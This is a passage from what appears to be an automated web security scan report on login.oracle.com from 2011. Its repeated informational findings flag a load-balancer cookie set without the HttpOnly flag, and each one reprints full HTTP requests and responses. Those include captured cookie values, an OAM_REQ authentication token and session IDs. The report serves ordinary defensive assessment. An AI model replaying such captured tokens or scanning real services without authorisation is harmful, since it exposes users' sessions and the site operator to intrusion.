Hl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:14:17 GMT Accept-Ranges: bytes Content-Length: 200 Content-Type: image/gif Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT X-ORACLE-DMS-ECID: 0000J8zXCB_6uHK6EVADUS1EHWFB01t_cj X-Powered-By: Servlet/2.5 JSP/2.1Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/ GIF89a.......................................................................................................!.......,..........E.D.di........ .,..........#.3!..R".$.......N..br29..[..@.4l.4@a...pw..;
13.92. https://login.oracle.com/mysso/sso_loginui/gray-b-l-t.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/gray-b-l-t.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mysso/sso_loginui/gray-b-l-t.gif HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: https://login.oracle.com/mysso/signon.jsp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:14:16 GMT Accept-Ranges: bytes Content-Length: 200 Content-Type: image/gif Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT X-ORACLE-DMS-ECID: 0000J8zXBpq6uHK6EVADUS1EHWFB01t_cC X-Powered-By: Servlet/2.5 JSP/2.1Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/ GIF89a.......................................................................................................!.......,..........E.$.AtHh..# ..C.t=..P.|=..DoH..v.^...>..^b..).U.$......8<....l......d..;
13.93. https://login.oracle.com/mysso/sso_loginui/gray-b-line.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/gray-b-line.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mysso/sso_loginui/gray-b-line.gif HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: https://login.oracle.com/mysso/signon.jsp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:14:17 GMT Accept-Ranges: bytes Content-Length: 45 Content-Type: image/gif Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT X-ORACLE-DMS-ECID: 0000J8zXC7v6uHK6EVADUS1EHWFB01t_cd X-Powered-By: Servlet/2.5 JSP/2.1Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/ GIF89a.............!.......,..............P.;
13.94. https://login.oracle.com/mysso/sso_loginui/gray-b-r-b.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/gray-b-r-b.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mysso/sso_loginui/gray-b-r-b.gif HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: https://login.oracle.com/mysso/signon.jsp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:14:17 GMT Accept-Ranges: bytes Content-Length: 198 Content-Type: image/gif Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT X-ORACLE-DMS-ECID: 0000J8zXC9J6uHK6EVADUS1EHWFB01t_ch X-Powered-By: Servlet/2.5 JSP/2.1Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/ GIF89a.......................................................................................................!.......,..........C`%.dINfj.j[.n ..L....5.8.(Gk(...PR...@...C..T....d].....N...y..x.!.;
13.95. https://login.oracle.com/mysso/sso_loginui/gray-b-r-t.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/gray-b-r-t.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mysso/sso_loginui/gray-b-r-t.gif HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: https://login.oracle.com/mysso/signon.jsp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:14:16 GMT Accept-Ranges: bytes Content-Length: 200 Content-Type: image/gif Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT X-ORACLE-DMS-ECID: 0000J8zXBpu6uHK6EVADUS1EHWFB01t_cD X-Powered-By: Servlet/2.5 JSP/2.1Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/ GIF89a.......................................................................................................!.......,..........E.$..xD...T..-......[.......G,.&D"!......"..5.U.$..r]./%.%s.YtU.e7.II..;
13.96. https://login.oracle.com/mysso/sso_loginui/gray-t-line.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/gray-t-line.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:19 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mysso/sso_loginui/gray-t-line.gif HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: https://login.oracle.com/mysso/signon.jsp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; 